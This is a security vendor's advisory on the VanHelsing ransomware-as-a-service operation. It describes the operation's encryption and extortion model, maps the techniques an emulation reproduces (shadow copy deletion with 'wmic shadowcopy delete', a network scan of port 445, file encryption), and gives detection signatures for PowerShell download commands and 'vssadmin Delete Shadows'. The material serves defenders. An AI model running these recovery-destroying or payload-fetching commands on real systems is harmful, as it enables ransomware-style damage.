VanHelsing is a ransomware-as-a-service (RaaS) operation that emerged in March 2025, quickly gaining traction within the cybercriminal community for its sophisticated techniques and aggressive targeting. It encrypts victims’ files and demands ransom payments in Bitcoin, using a double extortion model by exfiltrating data before encryption and threatening to leak it if the ransom isn’t paid. VanHelsing is notable for its cross-platform capability, affecting Windows, Linux, BSD, ARM devices, and VMware ESXi environments. The Windows variant is written in C++ and uses the Curve25519 and ChaCha20 algorithms for encryption, appending extensions such as “.vanhelsing” to affected files.
The operation follows a typical RaaS structure, requiring a $5,000 deposit from newcomers to join, with affiliates keeping 80% of ransom payments. Affiliates are provided with a dedicated control panel that allows them to manage attacks, track victims, and monitor payments. VanHelsing also maintains a public leak site where it publishes stolen data from non-paying victims. As of May 14, 2025, the ransomware operation has already infected five victims across the United States, France, Italy, and Australia and has leaked data from three of them.
AttackIQ has released a new attack graph composed the several Tactics, Techniques and Procedures (TTPs) exhibited by VanHelsing ransomware during its most recent activities with the aim of helping customers validate their security controls and their ability to defend against this recent threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against baseline behaviors associated with the VanHelsing ransomware.
- Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
- Continuously validate detection and prevention pipelines against a playbook similar to those used by currently active ransomware groups.
[Malware Emulation] VanHelsing Ransomware – 2025-03 – Associated Tactics, Techniques and Procedures (TTPs)
This emulation emulates the sequence of behaviors associated with the deployment of VanHelsing ransomware on a compromised system, including discovery and encryption activities, to provide customers with the opportunity to detect and/or prevent a compromise in progress.
The attack graph is based on behaviors reported by CheckPoint on March 23, 2025.
Initial Access & Discovery – Local System Reconnaissance
This stage begins with the deployment of VanHelsing ransomware and performs initial reconnaissance. It checks the presence of a debugger and it retrieves locale and system information from the system to avoid infecting unintended victims.
Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Virtualization/Sandbox Evasion (T1497): This scenario will execute the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
System Location Discovery (T1614): This scenario executes the GetUserDefaultLCID Windows native API call to retrieve the user default locale ID from the local system.
System Location Discovery (T1614): This scenario executes the GetUserDefaultLocaleName Windows API call to retrieve the user default locale name from the local computer.
System Location Discovery (T1614): This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer.
System Information Discovery (T1082): This scenario executes the GetEnvironmentStrings Windows native API call to discover environmental variables, usually used to fingerprint the system or search for stored passwords and secrets.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated to the system.
Discovery & Impact – VanHelsing Ransomware File Encryption
This stage begins with the deletion of system shadow copies to hinder recovery efforts. It then proceeds to identify accessible network shares and drives in order to facilitate lateral movement. Finally, the file system is then systematically traversed to identify files of interest, which are subsequently encrypted using a combination of ChaCha20 and Elliptic-curve Diffie–Hellman (ECDH) Curve 25519.
Native API (T1106): This scenario executes the CreateProcessA Windows API call to create a new process of a given executable payload.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a Volume Shadow Copy created by the emulation.
Peripheral Device Discovery (T1120): This scenario executes the GetLogicalDriveStringsW Windows native API call to retrieve information about the system’s physical drives.
Peripheral Device Discovery (T1120): This scenario retrieves information about the system’s physical disks using the GetDriveTypeW Windows API call.
Remote System Discovery (T1018): This scenario performs a scan of the local network searching for any remotely accessible systems with port 445 open.
Network Share Discovery (T1135): This scenario executes the net share command to list all network shares in the system.
Modify Registry (T1112): This scenario modifies the registry key HKEY_CURRENT_USER\Control Panel\Desktop to change the desktop wallpaper.
File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by VanHelsing ransomware.
Opportunities to Expand Emulation Capabilities
In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.
Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PSExec.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Ingress Tool Transfer (T1105):
This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.
1a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)
1b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
2. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
2a. Detection
Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity
Process Name == (cmd.exe OR powershell.exe)Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery
Wrap-up
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by VanHelsing ransomware operators. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
